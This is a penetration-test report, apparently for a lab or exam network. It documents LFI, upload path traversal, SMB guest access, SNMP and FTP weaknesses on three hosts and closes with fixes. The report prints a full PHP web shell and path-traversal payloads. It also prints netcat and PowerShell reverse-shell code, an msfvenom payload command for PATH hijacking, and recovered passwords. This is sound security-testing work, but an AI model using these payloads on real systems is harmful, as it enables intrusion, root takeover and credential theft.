Table of Contents

1. General Provisions............................................................................................................................3
1.1 Titles of works.......................................................................................................................... .3
1.2 Goals of work.............................................................................................................................3
2. Collection of data about the target infrastructure and facility......................................................... .3
3. Search for technical vulnerabilities................................................................................................. .3
4. Analysis of services and carrying out attacks...................................................................................4
4.1 192.168.123.112.........................................................................................................................4
4.2 192.168.123.111.......................................................................................................................16
4.3 192.168.123.110.......................................................................................................................31
5. Recommendations......................................................................................................................... .38
1. General Provisions

1.1 Titles of works

Name of work: penetration testing

1.2 Goals of work

The goal of the work was to obtain an objective and independent assessment of the current level of
security of the Customer’s corporate information system in relation to threats associated with
possible attacks by internal attackers.

2. Collection of data about the target infrastructure and facility

During penetration testing of the internal perimeter, the Performer was The following IP addresses
of the Customer were investigated:

192.168.123.112
192.168.123.111
192.168.123.110
192.168.123.100
192.168.123.101
192.168.123.102

3. Search for technical vulnerabilities

The results of collecting data from nodes containing vulnerabilities are shown in the
table below. (Table 1)

Table 1
N IP-Адрес Порт/протокол/служба Уязвимость
1 192.168.123.112 80 (Web) LFI
2 192.168.123.112 80 (Web) Bypassing the file download
path
3 192.168.123.112 80 (Web) RCE (via file upload)
4 192.168.123.111 445 (SMB) SMB guest access
5 192.168.123.110 161(SNMP) weak snmp community
string
6 192.168.123.110 21(FTP) ftp anonymous access
4. Analysis of services and carrying out attacks.

4.1 192.168.123.112

An nmap port scan shows that the following ports are open - 22,80,139,445. Working services SSH,
SMB, Web server. (Image 1)

Image 1

When you go to a web page, this page of the website opens. (Image 2)

Image 2
When you click on home, the same site page opens, but there are changes in the URL address. You
may notice that the home.html file is passed as the file parameter.
(http://192.168.123.112/index.php?file=home.html) (Image 3). This may indicate an LFI
vulnerability

Image 3

Using basic payload for LFI with line traversal (../../../../../../../../../../../../) failed to gain access to
files. But using a method to bypass non-recursive removal of ../ characters, I was able to access
the /etc/passwd file, thereby confirming the presence of the vulnerability

payload: ….//….//….//….//….//….//….//….//….//….//….//….//….//….//….//….//….//….//….//
….//….//etc/passwd (Image 4)

Image 4
From the /etc/passd file you can find out that there are 4 users on the host
1.root
2.kevin
3.bon
4.samantha

After determining the user names and their home directories, an attempt was made to obtain their
private keys for connecting via SSH, which should be located at /home/{username}/.ssh/id_rsa.

It was possible to obtain the private key of the user kevin (Image 5), but when connecting via SSH,
it was not possible to connect to the host using it.

Image 5

A file upload form was found at /index.php?file=request.php. (Image 6)

Image 6
The file upload form allows you to upload a php file, and it also turns out that it is also vulnerable
to directory traversal. If you specify ../../../../../../../../../home/kevin/1.php as the file name, the
resulting file will be downloaded to the /home/ directory kevin/1.php

As an example, a php file with the contents <?php echo “hello”; ?>, which displays the word hello.
(Image 7)

Image 7

After that, using the LFI vulnerability, access to a previously downloaded php file was gained, the
code from the php file was successfully executed. (Image 8)

Image 8
As an example, a php file containing the phpinfo() function was loaded. (Image 9,10)

Image 9

Image 10

.
To load the web shell, the following code was used; to execute system commands, it uses the
shell_exec function. (Code 1)

Code 1.

<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
*{
-webkit-box-sizing: border-box;
box-sizing: border-box;
}

body {
font-family: sans-serif;
color: rgba(0, 0, 0, .75);
}

main {
margin: auto;
max-width: 850px;
}

pre,
input,
button {
padding: 10px;
border-radius: 5px;
background-color: #efefef;
}

label {
display: block;
}

input {
width: 100%;
background-color: #efefef;
border: 2px solid transparent;
}

input:focus {
outline: none;
background: transparent;
border: 2px solid #e6e6e6;
}

button {
border: none;
cursor: pointer;
margin-left: 5px;
}
button:hover {
background-color: #e6e6e6;
}

.form-group {
display: -webkit-box;
display: -ms-flexbox;
display: flex;
padding: 15px 0;
}
</style>

</head>

<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>

<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>

<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>

<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>
Loading the Web shell (Image 11)

Image 11

Receiving web shell, system commands are executed successfully. (Image 12)

Image 12
Using the command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f we
get the reverse shell (Image 13)

Image 13

On our machine, we run netcat in listening mode on port 80, and we get a reverse shell. (Image 14)

Image 14

.
192.168.123.112 — local.txt (Image 15)

Image 15

I examine machine 192.168.123.112 and find a scheduled cron job running the command netstat -
tlpn > /root/networkadmin.txt (Image 16)

Image 16

.
When running netstat, a non-absolute path is used, this can be abused by generating
your own binary file called netstat and copying it to the /dev/shm directory. Since
when running netstat, a non-absolute path is used, the utility will initially be searched
from the PATH environment variable, since the /dev/shm directory is first in the list,
and it is from there that netstat will be launched.

Command to generate a malicious elf file (Image 17)

msfvenom -p linux/x64/shell_tcp LHOST={IP} LPORT={PORT} -f elf > netstat

Image 17

Copying netstat to /dev/shm directory (Image 18)

Image 18
After some time we get a reverse shell with root privileges (Image 19)

Image 19

192.168.123.112 — proof.txt (Image 20)

Image 20

.
4.2 192.168.123.111

An nmap port scan shows that the following ports are open -
80,135,139,445,443,3389. Working RDP, SMB, Web server services. (Image 21)

Image 21

When you go to the web server, the following page opens. (Image 22)

Image 22
By fuzzing directories, we discover a new page located along the path
http://192.168.123.111/launch (Image 23)
Image 23

.
There is nothing interesting on this web page except one thing, the link for which we
can visit launch6. (Image 24)

Image 24
When you click on a link, one redirects to localhost (Image 25)

Image 25

But if we use the current IP address of the vulnerable machine (192.168.123.111)

instead of localhost, we can access Windows Powershell Web Access. (Image 26)

Image 26
It was discovered that the SMB service supports guest login. There is an interesting
directory called AnneAuto (Image 27)

Image 27

In this directory, an archive called emails.zip was found, available for download.
(Image 28)

Image 28
Downloading email.zip from an SMB server. (Image 29)

Image 29

This archive is password protected. (Image 30)

Image 30
I use the zip2john utility to extract the hash from the archive, after which we can
carry out a brute force attack using the johntheripper utility. The rockyou.txt
dictionary was used as a dictionary

Managed to crack the archive password - 1chief (Image 31)

Image 31

.
The archive contains msg files, which are copies of emails.
In one of the files (20230922084703.msg) a letter was found with a potential
password for the remote server - Volatic1992 (Image 32)

Image 32
Using the impachet-lookupsid utility, a list of current users on the machine
192.168.123.111 was obtained, as well as the OSCP machine name. (Image 33)

Image 33

Using the previously collected data, we can try to connect to Windows PowerShell
Web Access (Image 34)

Image 34
I was able to successfully connect to Windows Powershell Web Access, and now it is
possible to execute Powershell code on the machine. (image 35)

Image 35

Using the following powershell code encoded in base64 Received reverse shell (Code
2) (Image36)

code 2
$Text = '$client = New-Object System.Net.Sockets.TCPClient("{IP}",{PORT});$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0,
$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
 Image 36

Executing shell code. (Image 37)

Image 37
Receiving the reverse shell. (Image 38)

Image 38

192.168.123.111 — local.txt (Image 39)

Image 39
At the path C:\Users\All Users\McAfee\Common Framework\SiteList.xml, a file
containing protected passwords of some users was discovered. (Image 40,41)

Image 40

Image 41
The following script was used for decryption - https://github.com/funoverip/mcafee-
sitelist-pwd-decryption (Image 42)

Image 42

Decrypted password - CheeseCrackerGrapes902 (Image 43)

Image 43
This password is suitable for the Administrator user (Image 44)

Image 44

Access via RDP was obtained for the Administrator user (Image 45)

Image 45
192.168.123.111 — proof.txt (Image 46)

Image 46
4.3 192.168.123.110

Nmap scanning shows that the following ports are open - 21,22, 161(udp). Running
services - FTP, SSH, SNMP (Image 47,48)

Image 47

Image 48
The FTP server supports anonymous login. db_connect.php file was found (Image
49)

Image 49

A potential credential was detected - student:secret%pass. (Image 50). But these

credentials are not valid.

Image 50
Using the onesixtyone tool to list community strings for snmp, the security string was
found. (Image 51)

Image 51

I'm using snmpwalk and managed to get the credentials jack:Not2Easy4Win8! (Image
52)

Image 52

Using these credentials, I was able to connect to the machine via SSH. (Image 53)

Image 53
192.168.123.110 — local.txt (Image 54)

Image 54
Using the id command we can find out that the user jack is in group 6 (disk). (Image
55) If we are in this group we also have full read and write access to the disk block
files, so we can retrieve them or write arbitrary data to them (Image 56)

Image 55

Image 56
Using debugfs, we gain access to the disk space, after which we can go to the root
user's directory and access his private SSH key. (Image 57)

Image 57
Using this private SSH key, we can access the system via SSH from the root user.
(Image 58)

Image 58

192.168.123.110 — proof.txt (Image 59)

Image 59
5. Recommendations

1. Filtering data transmitted in the file parameter (http://192.168.123.112/index.php?

file=home.html), recursively removing characters ../

2. Filtering the file name in the upload form at http://192.168.123.112/index.php?file=request.php,

recursively removing ../ characters from the file name. Prohibition on downloading php files.

3. Deny guest login to the SMB server at 192.168.123.111:445

4. Change the password for the email.zip archive located on the SMB server at
192.168.123.111:445 to a more complex one.

5. Change the community string for snmp at 192.168.123.110

6. Deny anonymous login via FTP at 192.168.123.110